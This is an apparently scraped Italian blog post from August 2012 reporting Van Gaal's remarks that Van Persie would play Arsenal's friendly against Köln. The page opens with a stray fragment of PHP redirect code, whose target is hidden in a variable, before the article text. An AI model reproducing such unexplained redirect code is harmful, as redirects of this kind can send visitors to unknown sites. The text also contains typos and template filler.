location.href='". $red ."';"; exit(); } ?> Notizie 24 News: Calciomercato Arsenal, Van Gaal: "Van Persie giocherà col Colonia, ma..."

Ads 468x60px

Random Post

Template Updates

domenica 12 agosto 2012

Calciomercato Arsenal, Van Gaal: "Van Persie giocherà col Colonia, ma..."


 



CALCIOMERCATO ARSENAL OLANDA VAN PERSIE VAN GAAL - Il futuro dell'attaccante dell'Arsenal Robin Van Persie è ancora tutto un punto interrogativo, si sa. Eppure per il momento il giocatore non si è ancora mosso dai Gunnersa anzi, l'olandese giocherà l'amichevole di oggi contro il Colonia, come confermato da più parti e anche dal c. t. dell'Olanda Luis Van Gaal.

"Robin giocherà domenica, mi ha riferito che per questa settimana sarà in campo almeno 45 minuti - ha detto ieri Van Gaal al Mirror - . E' una cosa buona, perchè altrimenti io non lo avrei convocato. Van Persie è un elemento importanza della nazionale, ma questa sarà l'unica occasione in cui convocherò sia lui che Van der Vaart anche se non sono in forma. Non hanno ancora quasi mai giocato con i loro club e, normalmente, io non convoco giocatori fuori forma. In futurò chiamerò soltanto giocatori in grado di giocare".

0 commenti:

Posta un commento

 

Sample text

Sample Text

Sample Text